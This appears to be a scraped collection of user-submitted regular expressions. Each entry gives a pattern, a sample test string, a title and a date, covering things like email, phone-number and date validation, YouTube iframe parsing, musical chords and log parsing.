rstp_test.DUAL_REDUNDANT_10_NODE.B1.B4_to_B6.1363278639.9911852.csv rstp_test.DUAL_REDUNDANT_10_NODE.B6.B7_to_B5.1364311665.000904.csv rstp_test.DUAL_REDUNDANT_10_NODE.B4.B5_to_B8.1363813189.996467.csv rstp_test.DUAL_REDUNDANT_10_NODE.B2.B3_to_B1.1362614802.786593.csv rstp_test.DUAL_REDUNDANT_10_NODE.B1.B10_to_B9.1361572327.4805002.csv rstp_test.DUAL_REDUNDANT_10_NODE.B2.B3_to_B6.1363362419.7933712.csv rstp_test.DUAL_REDUNDANT_10_NODE.L5.B3_to_B2.1363650069.2208295.csv rstp_test.DUAL_REDUNDANT_10_NODE.L2.B4_to_B8.1363275334.648175.csv rstp_test.DUAL_REDUNDANT_10_NODE.L1.B3_to_B5.1363197672.9529762.csv rstp_test.DUAL_REDUNDANT_10_NODE.L6.B5_to_B8.1363895589.0254374.csv rstp_test.DUAL_REDUNDANT_10_NODE.L6.B5_to_B10.1363877884.2168844.csv rstp_test.DUAL_REDUNDANT_10_NODE.L5.B3_to_B10.1363712782.7417006.csv rstp_test.DUAL_REDUNDANT_10_NODE.L3.B6_to_B1.1363305174.2594883.csv rstp_test.DUAL_REDUNDANT_10_NODE.L5.B3_to_B6.1363728569.4691412.csv rstp_test.DUAL_REDUNDANT_10_NODE.L3.B7_to_B10.1363373683.0458515.csv rstp_test.DUAL_REDUNDANT_10_NODE.L9.B9_to_B8.1364328188.6554158.csv rstp_test.DUAL_REDUNDANT_10_NODE.L4.B9_to_B10.1363633536.4020922.csv rstp_test.DUAL_REDUNDANT_10_NODE.L7.B10_to_B5.1363983735.8011973.csv rstp_test.DUAL_REDUNDANT_10_NODE.L7.B10_to_B3.1363964367.006156.csv rstp_test.DUAL_REDUNDANT_10_NODE.L8.B7_to_B10.1364253482.9512396.csv rstp_test.DUAL_REDUNDANT_10_NODE.L8.B7_to_B6.1364238460.4295537.csv rstp_test.DUAL_REDUNDANT_10_NODE.L9.B9_to_B4.1364395507.5920012.csv rstp_test.DUAL_REDUNDANT_10_NODE.L9.B9_to_B10.1364342893.1515784.csv rstp_test.DUAL_REDUNDANT_10_NODE.L7.B10_to_B1.1363910253.9667568.csv rstp_test.DUAL_REDUNDANT_10_NODE.L1.B3_to_B1.1363129843.7913983.csv rstp_test.DUAL_REDUNDANT_10_NODE.L4.B8_to_B2.1363617266.0452886.csv rstp_test.DUAL_REDUNDANT_10_NODE.L8.B7_to_B2.1364311578.8429968.csv rstp_test.DUAL_REDUNDANT_10_NODE.L2.B4_to_B1.1363217627.9490511.csv rstp_test.DUAL_REDUNDANT_10_NODE.L1.B2_to_B10.1362793282.2216735.csv rstp_test.DUAL_REDUNDANT_10_NODE.L3.B6_to_B4.1363358543.2095437.csv rstp_test.DUAL_REDUNDANT_10_NODE.L2.B5_to_B10.1363290159.8092709.csv rstp_test.DUAL_REDUNDANT_10_NODE.L1.B2_to_B6.1362776127.851785.csv rstp_test.DUAL_REDUNDANT_10_NODE.L7.B10_to_B9.1364225883.422663.csv rstp_test.DUAL_REDUNDANT_10_NODE.L1.B2_to_B1.1362678864.2163718.csv rstp_test.DUAL_REDUNDANT_10_NODE.L6.B5_to_B4.1363813115.5946567.csv rstp_test.DUAL_REDUNDANT_10_NODE.L1.B3_to_B10.1363107458.1968741.csv rstp_test.DUAL_REDUNDANT_10_NODE.L4.B8_to_B1.1363388728.1890316.csv rstp_test.DUAL_REDUNDANT_10_NODE.L7.B10_to_B7.1363996060.239112.csv rstp_test.6R.unicast.l1.b2_to_b5.R101.1383601503.308419.csv rstp_test.6R.unicast.l1.b2_to_b5.R102_rc.4k_rate_limiting_with_flush_on_isolated_vlan.1383774171.124428.csv rstp_test.6R.unicast.l1.b2_to_b5.R102_rc.4k_rate_limiting_with_flush_on_isolated_vlan.1383765495.9241686.csv
rstp
2015-07-27T16:11:37.000Z
match email address, with groups for entire email and domain.com
([\w.-]+@([\w-]+)\.+\w{2,})
user.name@domain.com
email match
2016-06-10T18:18:00.000Z
Search each occurence of one number in a comma separated list string
((?![0-9]).{0,1}(12)(?![0-9]).{0,1})|(^12)[,\s]
121,34,2,24,65,13,14,43,56,23,56,34,2,54,3,54,12,121,78,8,6,56,54,34,12
Search number in comma separated list
2016-01-29T15:36:36.000Z
^(\d?\d\/\d?\d\/(?:\d\d)\d\d)$
01/23/4567
Date 01
2015-12-11T14:02:40.000Z
by sachin
(?:^[ \t]{0,50}\r?\n){3}[ \t]{0,10}(http:\/\/(?!www\.)[^\s\/]{3,30})\/([ucv])\/([^\s\.]{3,60}\.html?)\S{0,10}[ \t]{0,10}\r?\n(?:^[ \t]{0,50}\r?\n){5,50}[^\/]{1,100}\b\1\/(?!\2)[ucv]\/\3
http://example.com/u/adadad.html sdfsf http://example.com/v/adadad.html
test2
2016-08-25T02:33:56.000Z
oauth_token=(?P<oauth_token>.*?)&portlet_session=(?P<portlet_session>.*?)
HTTP/1.1 302 Moved Temporarily Date: Wed, 27 May 2015 09:36:27 GMT Location: /oauth/liferay_redirect.php?oauth_token=23893f24b76534572041d29cfdf11565&portlet_session=8643FDCF76E2212A38316432F4ED8CA7 Content-Length: 0 Vary: Accept-Encoding,User-Agent Content-Type: text/plain; charset=UTF-8
Parsing the response of an oauth provider for token and session
2015-05-27T11:16:42.000Z
^[0-9]{0,1}\.*[0-9]{0,3},[0-9]{2,2}$
102,00 103,78 1.000,34 11.000,00 11.000,10 100,10
4.2 numerisch mit tausender kennzeichen
2015-11-11T09:41:36.000Z
get all typescript types, as well as imports and exports
[\t\s\n]*\/{2,3}@?.*|export|enum(\s?\{)(\n|.)*?\}|import\s(type\s)?\{.*}\s.*;|\slang="ts"|(?<=[\w]?)(?:\:\s.[a-zA-Z\[\]\'\s\.<>]*?)(?=\s|\,)|\<.+\>(?=[\w\(\)])
import type { WorkerThread, Thread, ThreadError, WorkerThreadFn } from "models"; export enum { } const pool: WeakMap<object, Thread> = new WeakMap(); const spawn: WorkerThread['spawn'] = (func: nice, wow, ) => { const ctx = {}; let executor } if (wow <= wow > ) export function thread<T>(): WorkerThread<T> { return { spawn } } <Wiw>wow thread().spawn((args) => { }) : Wow
Typescript Types
2023-02-11T06:46:54.000Z
[a-zA-Z]\,\s[a-zA-Z]
Cleveland, OH
location 2
2018-03-29T21:33:26.000Z
this will match the frequently and rarely using musical chords in a sheet music
[A-G]{1}([5])?([#b]{1})?(mM|Mm|m|M|aug|dim|add)?([679]|11)?((sus)([24]))?
Am7 G9 Sm Dbm6 Eb7sus2 Bbm9 G7 Aaug Cdim6
musical chords
2018-06-22T12:05:05.000Z
Youtube Iframes to Shortcode
(<iframe.*?(?:www\.)?(?:youtu\.be|youtube.*?\.com)\/(?:embed\/|v\/|watch\?v=|watch\?.+&v=)?((?:[\w-]{11})).*?>.*?\n*?<\/iframe>)
<iframe width="560" height="315" src="https://www.youtube.com/embed/ipuU0hHYiF4" frameborder="0" gesture="media" allow="encrypted-media" allowfullscreen></iframe> zsdasd <iframe width="560" height="315" src="https://www.youtube.com/embed/ipuU0hHYiF4" frameborder="0" gesture="media" allow="encrypted-media" allowfullscreen></iframe> k;l; <iframe width="560" height="315" src="https://www.youtube.com/embed/ipuU0hHYiF4?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" gesture="media" allow="encrypted-media" allowfullscreen></iframe> <iframe>teste</iframe> <iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/ipuU0hHYiF4?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" gesture="media" allow="encrypted-media" allowfullscreen></iframe><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/ipuU0hHYiF4?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" gesture="media" allow="encrypted-media" allowfullscreen></iframe><iframe>teste</iframe>
INT-451
2017-11-30T17:40:21.000Z
^.*\(((?:RR|RI|PC|PR|PA)R\d{3}){0,1}\) \[([1-2]\d{7}@\d{6})\]\.( <<.*>>){0,1}$
() [20130522@115839]. <<venalink>> 14.9 Drug Dictionary 03/06/1999 Existing letter file 'P:\WORDPROC\CLINCORR\00311000.CLI' deleted when adding letter Existing letter file 'P:\WORDPROC\CLINCORR\0046O000.CLI' deleted when adding letter Mode=CACHED PROFILE;Token Id=;RoleProfile=;Role=,User=SYS Mode=LEGACY;Token Id=AQIC5wM2LY4SfcyXAQB0EBD9MWbdEKQjnCGKw8iNj6Gu3FU=;RoleProfile=339601626031;Role=R1740 Prescription Reprint <<NUMBER OF REPEATS INCORECT ON SCR Prescription Reprint <<seems to have been given ferrous Quarter 1 2000 Typed in name: MD Vision 2.00 Install successful on Computername: RECEPTION for filesystem: Live System - Live Vision 22.00.0004 Install successful on Computername: CON06 for filesystem: Live System - Live ilesystem: Live System - Live () [20130522@115839]. <<venalink>> Cancellation (RIR013) [20150317@171114]. <<At the Pharmacist's request.Following reauthorisation of these cms scripts, the old ones diod not drop off the repeats or CMS screen. Phoned IT and they were not sure why this had happened, but advised that it was OK to inactivate the old repeats and this would not affect the CP claim in anyway even though a message stating that inactivation cancels the existing script.>> Other (RIR011) [20150604@095752]. Prescription Reprint <<chewed up>> ÃÂ?Â?Â?Â?Â?Â<ÿUÂ<ìƒì(SVWÂ?zøÂ?Â"[K () [20130731@090559]. () [20150930@105009].
Event reasons including invalid
2018-07-17T07:41:22.000Z
(?<command>^\w+)|(^|\s)(?<code>[^ ]*)+
xcopy C:\test D:\target\backup\files C:\aaa D:\target\backup\bbb
コマンドテスト
2018-09-21T12:55:55.000Z
\A[&!*,#@'"`{}[\]]
Allows configuration of tasks to be executed in response to events.
yaml
2020-10-02T14:34:46.000Z
Basic RegEx to catch ITU E.164 Formatted Telephone Numbers. Must include leading '+', first digit cannot be a zero, no other non-numeric characters -- with (optional) exception of Extensions denoted by ";ext=" and between 3 and 6 digits in the extension (adjust max to suit organization)
^\+[1-9][\d]{8,14}(;ext=[\d]{3,6})?$
+14160001234 +18001234567 +442012345678 +14160007890;ext=12345 # Max Digits is 15 +123456789012345 +123456789012345;ext=123456 +1234567890123456
E.164 ITU Telephony Standard including Extensions
2021-03-18T22:31:57.000Z
This looks to attempt to validate email addresses per the RFC. I don't know how accurate it is.
(?(DEFINE) (?<addr_spec> (?&local_part) @ (?&domain) ) (?<local_part> (?&dot_atom) | (?&quoted_string) | (?&obs_local_part) ) (?<domain> (?&dot_atom) | (?&domain_literal) | (?&obs_domain) ) (?<domain_literal> (?&CFWS)? \[ (?: (?&FWS)? (?&dtext) )* (?&FWS)? \] (?&CFWS)? ) (?<dtext> [\x21-\x5a] | [\x5e-\x7e] | (?&obs_dtext) ) (?<quoted_pair> \\ (?: (?&VCHAR) | (?&WSP) ) | (?&obs_qp) ) (?<dot_atom> (?&CFWS)? (?&dot_atom_text) (?&CFWS)? ) (?<dot_atom_text> (?&atext) (?: \. (?&atext) )* ) (?<atext> [a-zA-Z0-9!#$%&'*+\/=?^_`{|}~-]+ ) (?<atom> (?&CFWS)? (?&atext) (?&CFWS)? ) (?<word> (?&atom) | (?&quoted_string) ) (?<quoted_string> (?&CFWS)? " (?: (?&FWS)? (?&qcontent) )* (?&FWS)? " (?&CFWS)? ) (?<qcontent> (?&qtext) | (?&quoted_pair) ) (?<qtext> \x21 | [\x23-\x5b] | [\x5d-\x7e] | (?&obs_qtext) ) # comments and whitespace (?<FWS> (?: (?&WSP)* \r\n )? (?&WSP)+ | (?&obs_FWS) ) (?<CFWS> (?: (?&FWS)? (?&comment) )+ (?&FWS)? | (?&FWS) ) (?<comment> \( (?: (?&FWS)? (?&ccontent) )* (?&FWS)? \) ) (?<ccontent> (?&ctext) | (?&quoted_pair) | (?&comment) ) (?<ctext> [\x21-\x27] | [\x2a-\x5b] | [\x5d-\x7e] | (?&obs_ctext) ) # obsolete tokens (?<obs_domain> (?&atom) (?: \. (?&atom) )* ) (?<obs_local_part> (?&word) (?: \. (?&word) )* ) (?<obs_dtext> (?&obs_NO_WS_CTL) | (?&quoted_pair) ) (?<obs_qp> \\ (?: \x00 | (?&obs_NO_WS_CTL) | \n | \r ) ) (?<obs_FWS> (?&WSP)+ (?: \r\n (?&WSP)+ )* ) (?<obs_ctext> (?&obs_NO_WS_CTL) ) (?<obs_qtext> (?&obs_NO_WS_CTL) ) (?<obs_NO_WS_CTL> [\x01-\x08] | \x0b | \x0c | [\x0e-\x1f] | \x7f ) # character class definitions (?<VCHAR> [\x21-\x7E] ) (?<WSP> [ \t] ) ) ^(?&addr_spec)$
Valid ------- first.last@iana.org 1234567890123456789012345678901234567890123456789012345678901234@iana.org "first\"last"@iana.org "first@last"@iana.org "first\\last"@iana.org x@x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x23456789.x2 1234567890123456789012345678901234567890123456789012345678@12345678901234567890123456789012345678901234567890123456789.12345678901234567890123456789012345678901234567890123456789.123456789012345678901234567890123456789012345678901234567890123.iana.org first.last@[12.34.56.78] first.last@[IPv6:::12.34.56.78] first.last@[IPv6:::b3:b4] first.last@[IPv6:::] first.last@[IPv6:1111:2222:3333::4444:12.34.56.78] "first\last"@iana.org user+mailbox@iana.org customer/department@iana.org customer/department=shipping@iana.org "Doug \"Ace\" L."@iana.org +1~1+@iana.org {_test_}@iana.org "[[ test ]]"@iana.org "test&#13;&#10; blah"@iana.org (foo)cal(bar)@(baz)iamcal.com(quux) cal(woo(yay)hoopla)@iamcal.com cal(foo\@bar)@iamcal.com cal(foo\)bar)@iamcal.com first(Welcome to&#13;&#10; the ("wonderful" (!)) world&#13;&#10; of email)@iana.org pete(his account)@silly.test(his host) c@(Chris's host.)public.example Invalid --------- first@...........com first.last@sub.do,com first\@last@iana.org first.last .first.last@iana.org first.last.@iana.org "first"last"@iana.org """@iana.org first\\@last@iana.org Doug\ \"Ace\"\ Lovell@iana.org ()[]\;:,><@iana.org test@. test@[123.123.123.123 test@123.123.123.123]
RFC Email address attempt
2015-12-04T17:39:19.000Z
intended for JetBrains IDEs regex find/replace
([0-9]+)([\s]*)=>([\s]*)([1-9]+)
1 => 1
drupal 7 fix conditional fields Features export
2015-12-09T10:21:32.000Z
^\s?(?P<state>\d\d?)\s?(?P<district>\d\d?)
198 X 11 1 Y
state district
2016-08-05T01:26:47.000Z
Will return domain portion of a url: Example: http://www.jkrowlings.com/books Returns: www.jkrowlings.com
^(?:https?:\/\/)?([a-zA-Z0-9\.\-_]+)(?:[\/.\-_a-zA-Z0-9]*)$
www.jfkairport.hilton.com/weddings
Domain
2015-08-11T19:26:32.000Z